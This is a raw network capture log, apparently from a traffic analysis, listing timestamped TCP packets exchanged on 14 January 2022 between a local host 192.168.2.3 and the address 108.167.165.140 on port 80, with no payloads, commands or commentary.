Jan 14, 2022 13:49:22.505326033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505331039 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505343914 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505361080 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505364895 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505378008 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505394936 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505400896 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505410910 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505424023 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505428076 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505445957 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505456924 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505462885 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505479097 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505491018 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505496979 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505512953 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505516052 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505530119 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505541086 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505546093 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505563021 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505573988 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505579948 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505595922 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505609035 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505614042 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505630970 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505634069 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505646944 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505656004 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505664110 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505681038 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505690098 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505697012 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505713940 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505726099 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505731106 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505747080 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505750895 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505764961 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505773067 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505781889 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505799055 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505808115 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505815983 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505832911 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505845070 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505860090 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505875111 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505877972 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505893946 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505901098 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505909920 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505927086 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505933046 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505944014 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505961895 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505966902 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505979061 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505989075 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505995989 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506011963 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506023884 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506027937 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506046057 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506058931 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506062031 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506079912 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506082058 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506097078 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506114006 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506119967 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506130934 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506148100 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506153107 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506164074 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506177902 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506182909 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506198883 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506211042 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506215096 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506233931 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506246090 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506249905 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506268978 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506274939 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506285906 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506302118 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506303072 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506320000 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506328106 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506336927 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506352901 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506361961 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506371021 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506386995 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506397009 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506406069 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506421089 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506422997 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506439924 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506443977 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506458044 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506474972 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506479025 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506493092 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506510973 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506514072 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506526947 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506536961 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506546021 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506562948 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506571054 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506580114 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506597042 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506607056 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506613016 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506629944 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506635904 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506647110 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506663084 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506664038 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506681919 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506685019 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506697893 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506715059 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506721973 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506731987 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506750107 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506755114 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506767035 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506778955 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506784916 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506802082 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506812096 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506819963 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506836891 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506845951 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506854057 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506870031 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506871939 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506889105 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506895065 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506905079 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506922007 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506932020 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506938934 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506954908 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506970882 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506972075 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.506988049 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.506994009 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507004976 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507021904 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507030010 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507039070 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507056952 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507061958 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507072926 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507086039 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507091045 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507107973 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507119894 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507122993 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507139921 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507157087 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507157087 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507173061 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507180929 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507191896 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507209063 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507216930 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507225990 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507242918 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507256985 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507260084 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507277012 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507282972 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507292986 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507309914 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507311106 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507328033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507330894 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507344007 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507361889 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507369041 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507378101 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507394075 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507401943 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507411957 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507428885 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507431030 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507445097 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507455111 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507462978 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507478952 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507491112 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507494926 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507519960 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507531881 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507535934 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507553101 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507558107 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507570028 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507582903 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507586956 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507603884 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507616997 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507621050 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507637978 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507651091 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507656097 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507673979 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507680893 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507690907 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507709026 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507716894 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507725954 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507742882 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507751942 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507760048 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507776976 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507777929 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507795095 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507803917 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507812023 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507829905 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507841110 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507847071 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507863998 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507875919 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507882118 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507900000 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507905006 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507916927 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507930994 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.507935047 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507950068 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.507966995 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.508003950 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.508008003 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.508023024 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.654473066 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654499054 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654515982 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654534101 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654553890 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654555082 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.654572964 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654591084 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654607058 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.654607058 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654623985 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654644966 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654649019 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.654663086 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654676914 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.654680967 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654700041 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654707909 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.654716969 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654733896 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654752016 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.654752970 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654772043 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654788971 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654793024 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.654804945 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654819965 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.654823065 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654840946 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654848099 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.654856920 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654875040 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654891968 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654892921 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.654910088 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654927015 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654928923 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.654943943 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654962063 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654963017 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.654978991 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.654988050 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.654995918 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655014038 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655030012 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655038118 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655046940 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655065060 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655076981 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655081987 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655098915 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655102968 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655114889 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655132055 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655132055 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655149937 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655165911 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655178070 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655184984 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655205011 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655220032 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655220985 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655237913 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655246973 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655256033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655275106 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655288935 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655297995 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655316114 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655333042 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655339956 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655353069 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655370951 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655371904 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655388117 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655401945 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655405045 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655421972 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655438900 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655450106 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655455112 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655476093 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655493021 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655493975 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655509949 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655520916 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655528069 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655543089 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655544996 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655561924 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655574083 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.655579090 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655596972 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655612946 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655630112 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.655632019 CET	49743	80	192.168.2.3	108.167.165.140
